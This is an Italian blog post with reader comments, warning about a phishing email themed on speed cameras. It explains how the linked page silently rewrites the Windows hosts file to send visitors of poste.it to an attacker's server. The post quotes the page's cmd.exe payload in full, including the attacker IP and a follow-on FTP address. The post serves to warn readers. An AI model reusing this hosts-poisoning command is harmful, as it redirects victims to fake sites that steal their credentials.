sfruttare la paura dell’autovelox

Mario mi invia un messaggio di phishing proprio “simpatico” che gli è arrivato (e che gmail fortunatamente mette nello spam).
Il messaggio ha come titolo Autovelox e Tutor: dove sono?, il sedicente mittente è info@auto.it, la provenienza sembra essere dall’IP 192.168.74.6, e racconta di come la polstrada abbia messo un sito dove sono indicate le postazioni degli autovelox (vero). Cosa succede però se si apre il link, che – come forse avete immaginato – NON è al sito della Polizia Stradale?
Il codice HTML di quella pagina contiene tra l’altro queste righe:
<param name='first' value='cmd.exe /c echo 210.86.2.150 poste.it >>
%windir%\System32\drivers\etc\hosts & echo 210.86.2.150 www.poste.it
>> %windir%\System32\drivers\etc\hosts' >

Detto in termini meno criptici: se uno ha un PC con Windows, gira con i privilegi di amministratore, e ha un browser non troppo sveglio (Insomma Etilista) allora la pagina web fa in modo che la prossima volta che il malcapitato vuole andare nel sito www.poste.it sarà automaticamente rediretto al sito 210.86.2.150, che a sua volta (in questo momento, ma il bello della cosa è che possono cambiarlo quando vogliono!) punta a ftp://213.123.204.189/bpol/cartepre/index.html; che cosa faccia questo sito, ve lo lascio immaginare.
Come avrete intuito, la cosa pericolosa è che il phishing vero e proprio arriva in un secondo momento, e quindi l’ignaro utente non si accorge di nulla. Sapevàtelo!

Ultimo aggiornamento: 2010-03-05 11:44

5 pensieri su “sfruttare la paura dell’autovelox

  1. maxxfi

    Il quale 210.86.2.150 sembra essere l’IP di utente di un ISP neozelandese. Magari dare un avviso agli admin di Xtra NZ potrebbe salvare qualche ignaro navigante.
    Ingegnoso pero’ il trucco!

  2. mestesso

    Funziona se e solo se l’utente che esegue ha i privilegi di amministratore E una versione di Explorer vecchia. Quelle più recenti ti chiedono “ma vuoi veramente fare questo?”.
    E’ molto crudo come metodo. Quelli più ingegnosi sono i trojan mollati come drop all’interno di un PDF taroccato ad hoc. PDF assolotumante validi, presi da sorgenti genuine, mandati via mail da sorgenti apparentemente genuine ma con dei bei regailini dentro…

  3. .mau.

    @mestesso: il malware via PDF sta crescendo esponenzialmente, lo so; però alla fine non è ancora così usato dagli utenti casuali, mentre il web sì.

  4. ArgiaSbolenfi

    Con Vista/Seven cosa succede? Speravo che con la nuova gestione della sicurezza diminuisse un po’ il malware.. certo che se tutti gli utenti disabilitano i controlli o rispondono sì ad ogni “vuoi veramente fare questo?”..

  5. Bubbo Bubboni

    Già perché una volta che la colpa è ben assegnata all’utente il problema di chi vende quel software è risolto :-)

I commenti sono chiusi.